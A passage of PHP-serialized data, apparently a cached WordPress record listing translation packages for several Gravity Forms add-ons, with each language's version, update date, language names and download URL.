(France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:08+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2020-11-05T09:45:35+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:27+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:32+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-14T17:50:31+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:46+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:48+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-10-25T23:03:06+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-10-20T06:44:18+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:15+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-11-04T18:39:39+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:13:00+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:20:\"gravityformshighrise\";a:1:{s:12:\"translations\";a:21:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2022-06-27T09:59:10+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:14:10+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:12+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T12:56:45+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T12:56:21+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T12:56:25+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:27+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2020-07-17T13:47:39+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T12:56:18+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:33+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:35+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:40+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-03-14T17:51:12+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:52+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:54+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T12:56:52+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T12:56:56+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:13:23+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2021-08-02T17:30:03+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:14:05+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T17:14:07+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformshighrise/gravityformshighrise-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:19:\"gravityformshipchat\";a:1:{s:12:\"translations\";a:22:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:58:44+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2022-06-27T10:00:12+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:58:50+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:25+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:00+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:04+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:11+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2020-10-21T13:28:02+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:58:57+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:9:\"de/formal\";a:7:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:58:55+00:00\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:108:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-de_DE_formal.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2020-02-21T12:24:57+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2020-01-25T07:46:44+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:18+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2023-03-14T17:51:30+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:23+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2023-01-06T17:14:57+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2023-01-06T17:14:59+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:32+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:35+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2019-12-10T12:59:06+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2021-08-02T17:31:33+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.2\";s:7:\"updated\";s:25:\"2020-02-13T09:22:17+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshipchat/gravityformshipchat-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:19:\"gravityformsmadmimi\";a:1:{s:12:\"translations\";a:31:{s:2:\"ar\";a:7:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-02-20T14:25:46+00:00\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-ar.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ar\";i:1;s:3:\"ara\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:15+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:28+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:5:\"zh-hk\";a:7:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:45:20+00:00\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-zh_HK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:22+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:07+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketg